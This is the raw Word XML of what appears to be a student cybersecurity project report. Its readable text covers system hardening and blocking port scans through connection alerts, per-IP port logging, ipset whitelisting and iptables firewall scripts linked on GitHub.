                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="7773" y="1182"/>
                            <a:ext cx="4234" cy="841"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 12007 7774"/>
                              <a:gd name="T1" fmla="*/ T0 w 4234"/>
                              <a:gd name="T2" fmla="+- 0 1307 1182"/>
                              <a:gd name="T3" fmla="*/ 1307 h 841"/>
                              <a:gd name="T4" fmla="+- 0 11986 7774"/>
                              <a:gd name="T5" fmla="*/ T4 w 4234"/>
                              <a:gd name="T6" fmla="+- 0 1238 1182"/>
                              <a:gd name="T7" fmla="*/ 1238 h 841"/>
                              <a:gd name="T8" fmla="+- 0 11930 7774"/>
                              <a:gd name="T9" fmla="*/ T8 w 4234"/>
                              <a:gd name="T10" fmla="+- 0 1192 1182"/>
                              <a:gd name="T11" fmla="*/ 1192 h 841"/>
                              <a:gd name="T12" fmla="+- 0 11882 7774"/>
                              <a:gd name="T13" fmla="*/ T12 w 4234"/>
                              <a:gd name="T14" fmla="+- 0 1182 1182"/>
                              <a:gd name="T15" fmla="*/ 1182 h 841"/>
                              <a:gd name="T16" fmla="+- 0 7899 7774"/>
                              <a:gd name="T17" fmla="*/ T16 w 4234"/>
                              <a:gd name="T18" fmla="+- 0 1182 1182"/>
                              <a:gd name="T19" fmla="*/ 1182 h 841"/>
                              <a:gd name="T20" fmla="+- 0 7850 7774"/>
                              <a:gd name="T21" fmla="*/ T20 w 4234"/>
                              <a:gd name="T22" fmla="+- 0 1192 1182"/>
                              <a:gd name="T23" fmla="*/ 1192 h 841"/>
                              <a:gd name="T24" fmla="+- 0 7810 7774"/>
                              <a:gd name="T25" fmla="*/ T24 w 4234"/>
                              <a:gd name="T26" fmla="+- 0 1219 1182"/>
                              <a:gd name="T27" fmla="*/ 1219 h 841"/>
                              <a:gd name="T28" fmla="+- 0 7783 7774"/>
                              <a:gd name="T29" fmla="*/ T28 w 4234"/>
                              <a:gd name="T30" fmla="+- 0 1258 1182"/>
                              <a:gd name="T31" fmla="*/ 1258 h 841"/>
                              <a:gd name="T32" fmla="+- 0 7774 7774"/>
                              <a:gd name="T33" fmla="*/ T32 w 4234"/>
                              <a:gd name="T34" fmla="+- 0 1307 1182"/>
                              <a:gd name="T35" fmla="*/ 1307 h 841"/>
                              <a:gd name="T36" fmla="+- 0 7774 7774"/>
                              <a:gd name="T37" fmla="*/ T36 w 4234"/>
                              <a:gd name="T38" fmla="+- 0 1808 1182"/>
                              <a:gd name="T39" fmla="*/ 1808 h 841"/>
                              <a:gd name="T40" fmla="+- 0 7783 7774"/>
                              <a:gd name="T41" fmla="*/ T40 w 4234"/>
                              <a:gd name="T42" fmla="+- 0 1856 1182"/>
                              <a:gd name="T43" fmla="*/ 1856 h 841"/>
                              <a:gd name="T44" fmla="+- 0 7810 7774"/>
                              <a:gd name="T45" fmla="*/ T44 w 4234"/>
                              <a:gd name="T46" fmla="+- 0 1896 1182"/>
                              <a:gd name="T47" fmla="*/ 1896 h 841"/>
                              <a:gd name="T48" fmla="+- 0 7850 7774"/>
                              <a:gd name="T49" fmla="*/ T48 w 4234"/>
                              <a:gd name="T50" fmla="+- 0 1923 1182"/>
                              <a:gd name="T51" fmla="*/ 1923 h 841"/>
                              <a:gd name="T52" fmla="+- 0 7899 7774"/>
                              <a:gd name="T53" fmla="*/ T52 w 4234"/>
                              <a:gd name="T54" fmla="+- 0 1933 1182"/>
                              <a:gd name="T55" fmla="*/ 1933 h 841"/>
                              <a:gd name="T56" fmla="+- 0 8113 7774"/>
                              <a:gd name="T57" fmla="*/ T56 w 4234"/>
                              <a:gd name="T58" fmla="+- 0 1933 1182"/>
                              <a:gd name="T59" fmla="*/ 1933 h 841"/>
                              <a:gd name="T60" fmla="+- 0 8194 7774"/>
                              <a:gd name="T61" fmla="*/ T60 w 4234"/>
                              <a:gd name="T62" fmla="+- 0 2022 1182"/>
                              <a:gd name="T63" fmla="*/ 2022 h 841"/>
                              <a:gd name="T64" fmla="+- 0 8274 7774"/>
                              <a:gd name="T65" fmla="*/ T64 w 4234"/>
                              <a:gd name="T66" fmla="+- 0 1933 1182"/>
                              <a:gd name="T67" fmla="*/ 1933 h 841"/>
                              <a:gd name="T68" fmla="+- 0 11882 7774"/>
                              <a:gd name="T69" fmla="*/ T68 w 4234"/>
                              <a:gd name="T70" fmla="+- 0 1933 1182"/>
                              <a:gd name="T71" fmla="*/ 1933 h 841"/>
                              <a:gd name="T72" fmla="+- 0 11931 7774"/>
                              <a:gd name="T73" fmla="*/ T72 w 4234"/>
                              <a:gd name="T74" fmla="+- 0 1923 1182"/>
                              <a:gd name="T75" fmla="*/ 1923 h 841"/>
                              <a:gd name="T76" fmla="+- 0 11971 7774"/>
                              <a:gd name="T77" fmla="*/ T76 w 4234"/>
                              <a:gd name="T78" fmla="+- 0 1896 1182"/>
                              <a:gd name="T79" fmla="*/ 1896 h 841"/>
                              <a:gd name="T80" fmla="+- 0 11997 7774"/>
                              <a:gd name="T81" fmla="*/ T80 w 4234"/>
                              <a:gd name="T82" fmla="+- 0 1856 1182"/>
                              <a:gd name="T83" fmla="*/ 1856 h 841"/>
                              <a:gd name="T84" fmla="+- 0 12007 7774"/>
                              <a:gd name="T85" fmla="*/ T84 w 4234"/>
                              <a:gd name="T86" fmla="+- 0 1808 1182"/>
                              <a:gd name="T87" fmla="*/ 1808 h 841"/>
                              <a:gd name="T88" fmla="+- 0 12007 7774"/>
                              <a:gd name="T89" fmla="*/ T88 w 4234"/>
                              <a:gd name="T90" fmla="+- 0 1307 1182"/>
                              <a:gd name="T91" fmla="*/ 1307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3" y="125"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="4212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6" y="37"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9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9" y="674"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="36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339" y="751"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="420" y="840"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="500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3" y="674"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4233" y="626"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="423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7773" y="1181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68AFE" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:before="86"/>
                                <w:ind w:left="423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System Hardening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657314" id="Group 60" o:spid="_x0000_s1069" style="position:absolute;left:0;text-align:left;margin-left:388.7pt;margin-top:59.1pt;width:211.7pt;height:42.05pt;z-index:-15699456;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="7774,1182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">
                <v:shape id="Freeform 62" o:spid="_x0000_s1070" style="position:absolute;left:7773;top:1182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" path="m4233,125l4212,56,4156,10,4108,,125,,76,10,36,37,9,76,,125,,626r9,48l36,714r40,27l125,751r214,l420,840r80,-89l4108,751r49,-10l4197,714r26,-40l4233,626r,-501xe" fillcolor="#365b8a" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4233,1307;4212,1238;4156,1192;4108,1182;125,1182;76,1192;36,1219;9,1258;0,1307;0,1808;9,1856;36,1896;76,1923;125,1933;339,1933;420,2022;500,1933;4108,1933;4157,1923;4197,1896;4223,1856;4233,1808;4233,1307" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 61" o:spid="_x0000_s1071" type="#_x0000_t202" style="position:absolute;left:7773;top:1181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4A868AFE" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="86"/>
                          <w:ind w:left="423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System Hardening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6B15D1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487192576" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1FFC8462" wp14:editId="356F6D55">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4584690</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>601506</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="118691" cy="3901835"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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91" cy="390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5D1">
        <w:t>Mitigation: Blocking the Port Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44564397" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C6BCD20" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EA9133A" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:sz w:val="12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0753604E" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="889"/>
          <w:tab w:val="left" w:pos="890"/>
        </w:tabs>
        <w:spacing w:before="96" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="889" w:right="141"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>An alert should be sent once 1000 connections</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-36"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>occur within an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>hour</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A247B6" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="889"/>
          <w:tab w:val="left" w:pos="890"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Log the number of ports that were accessed per IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-34"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>per</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A5CD83" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1189"/>
          <w:tab w:val="left" w:pos="1190"/>
        </w:tabs>
        <w:spacing w:before="96" w:line="273" w:lineRule="auto"/>
        <w:ind w:right="935"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Whitelist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>known</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>IPs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7"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>have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ﬁrewall</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>block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unauthorized IPs from scanning with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ipset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> create whitelisted </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>hash:net</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C9DD7F" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:spacing w:line="273" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito"/>
          <w:sz w:val="20"/>
        </w:rPr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num="2" w:space="720" w:equalWidth="0">
            <w:col w:w="5742" w:space="728"/>
            <w:col w:w="7470"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22435936" w14:textId="3C767E10" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="144"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EC22588" wp14:editId="61C422C3">
                <wp:extent cx="8605520" cy="2787015"/>
                <wp:effectExtent l="2540" t="0" r="2540" b="3810"/>
                <wp:docPr id="6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5520" cy="2787015"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="13552" cy="4389"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="63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7" y="4365"/>
                            <a:ext cx="13537" cy="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273"/>
                            <a:ext cx="5388" cy="4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745" y="0"/>
                            <a:ext cx="671" cy="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A28FA" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:line="234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second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7094" y="4"/>
                            <a:ext cx="9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B4EDFF" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:line="223" w:lineRule="exac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6942" y="1108"/>
                            <a:ext cx="242" cy="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C88B6" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:line="223" w:lineRule="exact"/>
                                <w:ind w:left="111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.</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="390569FC" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:before="6" w:line="270" w:lineRule="atLeast"/>
                                <w:ind w:right="18" w:firstLine="55"/>
                                <w:jc w:val="both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 xml:space="preserve">ii.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0"/>
                                </w:rPr>
                                <w:t xml:space="preserve">iii. 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0"/>
                                </w:rPr>
                                <w:t>iv.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7064" y="35"/>
                            <a:ext cx="6114" cy="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51B8F9" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:line="204" w:lineRule="exact"/>
                                <w:ind w:left="269"/>
                                <w:jc w:val="both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Block or trust IPs according to trust using the firewall. ‘Iptables’ utility</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="2931FA48" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:before="32" w:line="271" w:lineRule="auto"/>
                                <w:ind w:left="269" w:right="143"/>
                                <w:jc w:val="both"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito"/>
                                  <w:sz w:val="20"/>
                                </w:rPr>
                              </w:pP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program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example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has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many</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito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great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features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allow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rFonts w:ascii="Carlito" w:hAnsi="Carlito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block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certain ports.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Below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Carlito" w:hAnsi="Carlito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my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github</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito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scripts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arlito" w:hAnsi="Carlito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‘iptables’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utility</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito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firewall</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito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program. The INPUT script contains the</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito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rlito" w:hAnsi="Carlito"/>
                                  <w:sz w:val="20"/>
                                </w:rPr>
                                <w:t>following:</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="7D5B5D1E" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:line="271" w:lineRule="auto"/>
                                <w:ind w:left="449" w:right="3879"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Carli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rlito"/>
                                  <w:b/>
                                  <w:sz w:val="20"/>
                                </w:rPr>
                                <w:t>Dropping packets Port scan protection Removal of attacking</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="3510343F" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:line="271" w:lineRule="auto"/>
                                <w:ind w:left="449"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Carli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rlito"/>
                                  <w:b/>
                                  <w:sz w:val="20"/>
                                </w:rPr>
                                <w:t>Outright rejection of all input traffic (the excepted ports are in the OUTPUT script)</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="49B1218A" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:before="1" w:line="271" w:lineRule="auto"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Carlito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rlito"/>
                                  <w:b/>
                                  <w:sz w:val="20"/>
                                </w:rPr>
                                <w:t>The OUTPUT script is necessary to allow certain ports to be open for proper website functionality.</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="2B607E01" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="0022470B">
                              <w:pPr>
                                <w:ind w:right="20"/>
                                <w:jc w:val="right"/>
                                <w:rPr>
                                  <w:sz w:val="20"/>
                                </w:rPr>
                              </w:pPr>
                              <w:hyperlink r:id="rId44">
                                <w:r w:rsidR="006B15D1">
                                  <w:rPr>
                                    <w:color w:val="0070BF"/>
                                    <w:spacing w:val="-2"/>
                                    <w:sz w:val="20"/>
                                    <w:u w:val="single" w:color="0070BF"/>
                                  </w:rPr>
                                  <w:t>https://github.com/dbaimakov/ELK-Stack_project_1/blob/main/Scri</w:t>
                                </w:r>
                              </w:hyperlink>
                            </w:p>
                            <w:p w14:paraId="2FCEC228" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="0022470B">
                              <w:pPr>
                                <w:spacing w:before="36" w:line="239" w:lineRule="exact"/>
                                <w:ind w:right="18"/>
                                <w:jc w:val="right"/>
                                <w:rPr>
                                  <w:sz w:val="20"/>
                                </w:rPr>
                              </w:pPr>
                              <w:hyperlink r:id="rId45">
                                <w:r w:rsidR="006B15D1">
                                  <w:rPr>
                                    <w:color w:val="0070BF"/>
                                    <w:sz w:val="20"/>
                                    <w:u w:val="single" w:color="0070BF"/>
                                  </w:rPr>
                                  <w:t>pts/INPUTiptablescript.sh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7145" y="3864"/>
                            <a:ext cx="6034" cy="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4399C" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="0022470B">
                              <w:pPr>
                                <w:spacing w:line="236" w:lineRule="exact"/>
                                <w:ind w:right="20"/>
                                <w:jc w:val="right"/>
                                <w:rPr>
                                  <w:sz w:val="20"/>
                                </w:rPr>
                              </w:pPr>
                              <w:hyperlink r:id="rId46">
                                <w:r w:rsidR="006B15D1">
                                  <w:rPr>
                                    <w:color w:val="0070BF"/>
                                    <w:spacing w:val="-2"/>
                                    <w:sz w:val="20"/>
                                    <w:u w:val="single" w:color="0070BF"/>
                                  </w:rPr>
                                  <w:t>https://github.com/dbaimakov/ELK-Stack_project_1/blob/main/Scri</w:t>
                                </w:r>
                              </w:hyperlink>
                            </w:p>
                            <w:p w14:paraId="6AD2CFAA" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="0022470B">
                              <w:pPr>
                                <w:spacing w:before="36" w:line="239" w:lineRule="exact"/>
                                <w:ind w:right="18"/>
                                <w:jc w:val="right"/>
                                <w:rPr>
                                  <w:sz w:val="20"/>
                                </w:rPr>
                              </w:pPr>
                              <w:hyperlink r:id="rId47">
                                <w:r w:rsidR="006B15D1">
                                  <w:rPr>
                                    <w:color w:val="0070BF"/>
                                    <w:sz w:val="20"/>
                                    <w:u w:val="single" w:color="0070BF"/>
                                  </w:rPr>
                                  <w:t>pts/OUTPUTiptablets.sh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C22588" id="Group 52" o:spid="_x0000_s1072" style="width:677.6pt;height:219.45pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="13552,43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">
                <v:line id="Line 59" o:spid="_x0000_s1073" style="position:absolute;visibility:visible;mso-wrap-style:square" from="7,4365" to="13544,4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" strokecolor="#a8b6bf"/>
                <v:shape id="Picture 58" o:spid="_x0000_s1074" type="#_x0000_t75" style="position:absolute;left:45;top:273;width:5388;height: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">
                  <v:imagedata r:id="rId48" o:title=""/>
                </v:shape>
                <v:shape id="Text Box 57" o:spid="_x0000_s1075" type="#_x0000_t202" style="position:absolute;left:745;width:671;height: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5B5A28FA" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:line="234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second</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="Text Box 56" o:spid="_x0000_s1076" type="#_x0000_t202" style="position:absolute;left:7094;top:4;width:91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19B4EDFF" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:line="223" w:lineRule="exac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sz w:val="20"/>
                          </w:rPr>
                          <w:t>•</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="Text Box 55" o:spid="_x0000_s1077" type="#_x0000_t202" style="position:absolute;left:6942;top:1108;width:242;height:1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1FAC88B6" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:line="223" w:lineRule="exact"/>
                          <w:ind w:left="111"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial"/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Arial"/>
                            <w:b/>
                            <w:sz w:val="20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z w:val="20"/>
                          </w:rPr>
                          <w:t>.</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="390569FC" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="6" w:line="270" w:lineRule="atLeast"/>
                          <w:ind w:right="18" w:firstLine="55"/>
                          <w:jc w:val="both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 xml:space="preserve">ii. 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0"/>
                          </w:rPr>
                          <w:t xml:space="preserve">iii. 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0"/>
                          </w:rPr>
                          <w:t>iv.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="Text Box 54" o:spid="_x0000_s1078" type="#_x0000_t202" style="position:absolute;left:7064;top:35;width:6114;height:3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1B51B8F9" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:line="204" w:lineRule="exact"/>
                          <w:ind w:left="269"/>
                          <w:jc w:val="both"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito"/>
                            <w:sz w:val="20"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito"/>
                            <w:sz w:val="20"/>
                          </w:rPr>
                          <w:t>Block or trust IPs according to trust using the firewall. ‘Iptables’ utility</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="2931FA48" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="32" w:line="271" w:lineRule="auto"/>
                          <w:ind w:left="269" w:right="143"/>
                          <w:jc w:val="both"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito"/>
                            <w:sz w:val="20"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito"/>
                            <w:sz w:val="20"/>
                          </w:rPr>
                          <w:t>program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for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example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has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many</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito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great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features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to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allow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or</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito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block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certain ports.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Below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are</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito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my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rlito" w:hAnsi="Carlito"/>
                            <w:sz w:val="20"/>
                          </w:rPr>
                          <w:t>github</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito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scripts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of</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito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‘iptables’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utility</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito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firewall</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito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program. The INPUT script contains the</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito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foll</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito"/>
                            <w:sz w:val="20"/>
                          </w:rPr>
                          <w:t>owing:</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="7D5B5D1E" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:line="271" w:lineRule="auto"/>
                          <w:ind w:left="449" w:right="3879"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Carlito"/>
                            <w:b/>
                            <w:sz w:val="20"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Carlito"/>
                            <w:b/>
                            <w:sz w:val="20"/>
                          </w:rPr>
